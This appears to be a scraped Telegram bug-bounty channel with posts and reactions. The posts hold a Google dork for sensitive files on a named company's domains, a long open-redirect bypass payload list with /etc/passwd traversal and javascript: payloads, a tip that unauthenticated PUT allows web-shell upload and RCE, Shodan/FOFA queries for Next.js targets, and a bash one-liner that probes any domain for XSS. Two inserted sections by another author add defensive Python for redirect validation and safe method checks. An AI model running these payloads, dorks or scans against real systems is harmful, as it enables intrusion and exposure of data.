exploit.py
5.2 KB
WordPress file upload vuln...
🔥7💋2❤1
2 Critical Bugs Found! | Live Bug Bounty Hunting on Bugcrowd | Live Recon 🔥
https://youtu.be/qR0ez9xZr_8?si=wzpcvOZpurQlhYXz
Get ready for an electrifying live bug bounty session where 2 critical bugs are discovered in real-time! Join me as I dive deep into the world of live recon and uncover high-priority…
🔥10❤3
Try this Google dork to find sensitive files on a website:
site:*.dell.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)
👍14🤣3🤔1
You can try these effective manual open redirect bypasses:
1. Null-byte injection:
- /google.com%00/
- //google.com%00
2. Base64 encoding variations:
- aHR0cDovL2dvb2dsZS5jb20=
- aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
- //base64:d3d3Lmdvb2dsZS5jb20=/
3. Case-sensitive variations:
- //GOOGLE.com/
- //GoOgLe.com/
4. Overlong UTF-8 sequences:
- %C0%AE%C0%AE%2F (overlong encoding for ../)
- %C0%AF%C0%AF%2F%2Fgoogle.com
5. Mixed encoding schemes:
- /%68%74%74%70://google.com
- //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
- //base64:%2F%2Fgoogle.com/
6. Alternative domain notations:
- //[email protected]/
- //127.0.0.1.xip.io/
- //0x7F000001/ (hexadecimal IP)
7. Trailing special characters:
- //google.com/#/
- //google.com/;&/
- //google.com/?id=123&//
8. Octal IP address format:
- https://0177.0.0.1/
- https://00177.0000.0000.0001/
9. IP address variants:
- https://3232235777 (decimal notation of an IP)
- https://0xC0A80001 (hex notation of IP)
- https://192.168.1.1/
10. Path traversal with encoding:
- /..%252f..%252f..%252fetc/passwd
- /%252e%252e/%252e%252e/%252e%252e/etc/passwd
- /..%5c..%5c..%5cwindows/system32/cmd.exe
11. Alternate protocol inclusion:
- ftp://google.com/
- javascript:alert(1)//google.com
12. Protocol-relative URLs:
- :////google.com/
- :///google.com/
13. Redirection edge cases:
- //google.com/?q=//bing.com/
- //google.com?q=https://another-site.com/
14. IPv6 notation:
- https://[::1]/
- https://[::ffff:192.168.1.1]/
15. Double URL encoding:
- %252f%252fgoogle.com (encoded twice)
- %255cgoogle.com
16. Combined traversal & encoding:
- /%2E%2E/%2E%2E/etc/passwd
- /%2e%2e%5c%2e%2e/etc/passwd
17. Reverse DNS-based:
- https://google.com.reverselookup.com
- //lookup-reversed.google.com/
18. Non-standard ports:
- https://google.com:81/
- https://google.com:444/
19. Unicode obfuscation in paths:
- /%E2%80%8Egoogle.com/
- /%C2%A0google.com/
20. Query parameters obfuscation:
- //google.com/?q=https://another-site.com/
- //google.com/?redirect=https://google.com/
21. Using @ symbol for userinfo:
- https://admin:[email protected]/
- https://@google.com
22. Combination of userinfo and traversal:
- https://admin:[email protected]/../../etc/passwd
👍8❤2
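Added example (mine, not from the post above or from any tool it names): two of the naive "is this redirect local?" checks that the payload families listed above get past, beside a hardened check, with a small model of how a browser resolves the resulting Location header. The application host example.com, the attacker host attacker.example and the seven payloads are constructed; they follow the post's categories (protocol-relative `//`, backslash, the allowed host placed in the userinfo before `@`, scheme smuggling, encoded CRLF). The post's own `@` entries have been mangled into `[email protected]` by an e-mail obfuscation filter, so the userinfo case is rebuilt here from its heading.

```python
# Added example (not from the post above): naive "is this URL local?" checks
# that the listed payload families defeat, beside a hardened check, with a
# small model of how a browser resolves the resulting Location header.
# ALLOWED_HOST, the attacker host and every payload are constructed.
from typing import List, Optional, Tuple
from urllib.parse import unquote, urljoin, urlsplit

ALLOWED_HOST = "example.com"            # the application's own host (assumed)
ORIGIN = f"https://{ALLOWED_HOST}"

# Constructed payloads, one per bypass family in the post, plus one genuine path.
PAYLOADS = [
    "/dashboard",                               # genuine local path
    "//attacker.example/",                      # protocol-relative URL
    "/\\attacker.example/",                     # browsers read '/\' as '//'
    "https://example.com@attacker.example/",    # allowed host in the userinfo part
    "//example.com.attacker.example/",          # allowed host as a subdomain label
    "javascript:alert(1)//example.com",         # scheme smuggling
    "/%0d%0aSet-Cookie:x=y",                    # CRLF once the server decodes it
]


def naive_is_local(next_url: str) -> bool:
    """Broken check 1: 'starts with / and is not an http(s) URL'."""
    lower = next_url.lower()
    return next_url.startswith("/") and not lower.startswith(("http://", "https://"))


def naive_contains_host(next_url: str) -> bool:
    """Broken check 2: 'our hostname appears somewhere in the value'."""
    return ALLOWED_HOST in next_url


def hardened_is_local(next_url: str) -> bool:
    """Accept only an absolute path on our own origin.

    Rejects a scheme or authority, a protocol-relative prefix, any backslash
    (browsers normalise it to '/'), and control or whitespace characters in
    either the raw value or the once-percent-decoded value."""
    for candidate in (next_url, unquote(next_url)):
        if not candidate or any(c <= " " or c == "\x7f" or c == "\\" for c in candidate):
            return False
    parts = urlsplit(next_url)
    if parts.scheme or parts.netloc:
        return False
    return next_url.startswith("/") and not next_url.startswith("//")


def browser_host(location: str) -> Optional[str]:
    """Approximate where a browser lands for a Location header value:
    backslashes become slashes, then the value is resolved against ORIGIN.
    Returns None when the result is not an http(s) host (e.g. javascript:)."""
    return urlsplit(urljoin(ORIGIN + "/", location.replace("\\", "/"))).hostname


def accepted_by_naive() -> List[str]:
    return [p for p in PAYLOADS if naive_is_local(p) or naive_contains_host(p)]


def accepted_by_hardened() -> List[str]:
    return [p for p in PAYLOADS if hardened_is_local(p)]


def naive_bypasses() -> List[Tuple[str, Optional[str]]]:
    """Payloads the naive checks accept that actually leave ALLOWED_HOST."""
    return [(p, browser_host(p)) for p in accepted_by_naive()
            if browser_host(p) != ALLOWED_HOST]


if __name__ == "__main__":
    for payload, host in naive_bypasses():
        print(f"naive check passes, browser goes to {host!r}: {payload}")
    print("hardened check accepts:", accepted_by_hardened())
```

Run it and the naive checks let all seven through, five of which land somewhere other than example.com; the hardened check keeps only /dashboard (the encoded CRLF payload stays on our host but is still rejected, because a server that decodes it before writing Location would emit an injected header). The hardened rule is the usual one: accept only a path that starts with a single slash, has no scheme or authority, no backslash and no control characters even after one round of percent-decoding, then build the Location header from your own origin plus that path.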
Triaged P1 and huge impact
#bugbountytip
Always check the allowed HTTP methods
====>
Using HTTP method PUT
==>
Attacker can create or modify files in this directory without providing any type of authentication.
==>
Attacker may be able to create a web shell in this directory, open a backdoor and run RCE
Using HTTP method DELETE
==>
Attacker can delete any file in that directory, and that
sometimes leads to taking down the host
👍7❤4🔥3
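Added example (mine, not from the post above): the check the tip describes, done non-destructively. It reads the Allow header from OPTIONS, then proves PUT and DELETE by uploading a small marker file, fetching it back, deleting it and confirming it is gone. The LaxHandler server inside the block is a stand-in for a misconfigured target so the whole thing runs offline on 127.0.0.1; the /uploads/ path and the marker filename are hypothetical.

```python
# Added example (not from the post above): enumerate the methods a directory
# advertises via OPTIONS, then confirm PUT/DELETE with a round-trip on a
# marker file that the check removes again. LaxHandler is a stand-in for a
# misconfigured server so this runs offline; MARKER and /uploads/ are hypothetical.
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

DANGEROUS = {"PUT", "DELETE", "PATCH", "TRACE"}   # methods worth flagging in Allow
MARKER = "/uploads/method-check-marker.txt"       # hypothetical probe path
MARKER_BODY = b"method-check marker, safe to delete\n"


class LaxHandler(BaseHTTPRequestHandler):
    """Stand-in for a server that honours PUT and DELETE without authentication."""
    store: dict = {}                               # path -> uploaded bytes

    def log_message(self, *args):                  # keep the demo quiet
        pass

    def _reply(self, status, body=b""):
        self.send_response(status)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_OPTIONS(self):
        self.send_response(204)
        self.send_header("Allow", "GET, OPTIONS, PUT, DELETE")
        self.send_header("Content-Length", "0")
        self.end_headers()

    def do_PUT(self):
        length = int(self.headers.get("Content-Length", 0))
        self.store[self.path] = self.rfile.read(length)
        self._reply(201)

    def do_GET(self):
        body = self.store.get(self.path)
        if body is None:
            self._reply(404)
        else:
            self._reply(200, body)

    def do_DELETE(self):
        self._reply(204 if self.store.pop(self.path, None) is not None else 404)


def _status(conn, method, path, body=None):
    """Send one request and return (status, Allow header)."""
    conn.request(method, path, body=body)
    resp = conn.getresponse()
    resp.read()
    return resp.status, resp.getheader("Allow")


def allowed_methods(host, port, path="/uploads/"):
    """Methods the server advertises for the directory, parsed from Allow."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    _, allow = _status(conn, "OPTIONS", path)
    conn.close()
    return {m.strip().upper() for m in (allow or "").split(",") if m.strip()}


def put_delete_roundtrip(host, port, path=MARKER):
    """Upload a marker, confirm it is served, delete it, confirm it is gone."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    result = {"put": _status(conn, "PUT", path, MARKER_BODY)[0] in (200, 201, 204)}
    result["served_after_put"] = _status(conn, "GET", path)[0] == 200
    result["delete"] = _status(conn, "DELETE", path)[0] in (200, 202, 204)
    result["gone_after_delete"] = _status(conn, "GET", path)[0] == 404
    conn.close()
    return result


def demo():
    """Run the check against the stand-in server; returns (allowed, roundtrip, flagged)."""
    server = HTTPServer(("127.0.0.1", 0), LaxHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    host, port = server.server_address
    try:
        allowed = allowed_methods(host, port)
        roundtrip = put_delete_roundtrip(host, port)
    finally:
        server.shutdown()
        server.server_close()
    return allowed, roundtrip, sorted(allowed & DANGEROUS)


if __name__ == "__main__":
    allowed, roundtrip, flagged = demo()
    print("Allow:", sorted(allowed), "flagged:", flagged)
    print("PUT/DELETE round-trip:", roundtrip)
```

Point allowed_methods and put_delete_roundtrip at a real host only inside scope, and keep the marker body harmless: an Allow header alone is not proof (servers often advertise methods they then refuse), while a successful round-trip is, and a genuine finding needs no web shell to demonstrate.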
How to Find SSRF Vulnerabilities in Next.js | Bug Bounty Hunting POC
https://youtu.be/80MF5blHO6w?si=21o4mwRlSjt5pMxg
😍16😭9❤2👎1🔥1
NextJS-Vulnerability.yaml
955 B
// Query //
en.fofa.info : body="/_next/static" && title="Next.js"
publicwww : body="/_next/static" title="Next.js"
shodan : body:"/_next/static" title:"Next.js"
❤9🔥2
How to find SSRF in Next.js
What if I put the video on a Facebook page?
👍34👎17💩5🔥1
privit-templat.zip
113.1 KB
Hi, I'm uploading my private template. Please support me, everyone, and I'll give you love...
3❤77👍6🔥3🤮3👎2🥰2
I uploaded this video: How to find SSRF vulnerabilities in Next.js. Video link:
https://www.facebook.com/share/v/cRfk7SdqbJfCSUR3/
❤14🔥2🥰2👍1
recon.txt
4.3 KB
Well, I haven't been posting YouTube videos for a while because I've been doing some case studies on advanced recon, and because I have been less active online for some reason. Some of my subscribers have said that the file is called Recon.Text. I gave my Telegram so I could give the file to them.
❤29👍5🔥4🥰1
XSS from JavaScript hidden params
DOMAIN="${1:?usage: $0 <domain>}"
assetfinder "$DOMAIN" | gau | grep -Ev '\.(css|svg)' | while read -r url; do
  # collect "var NAME" declarations from the page, emit url?NAME=xss for each, skip .js URLs
  vars=$(curl -s "$url" | grep -Eo 'var [a-zA-Z0-9]+' | awk -v u="$url" '{print u "?" $2 "=xss"}' | grep -v '\.js')
  printf '\e[1;33m%s\n\e[1;32m%s\e[0m\n' "$url" "$vars"
done
❤8👍4👎4🔥4💩1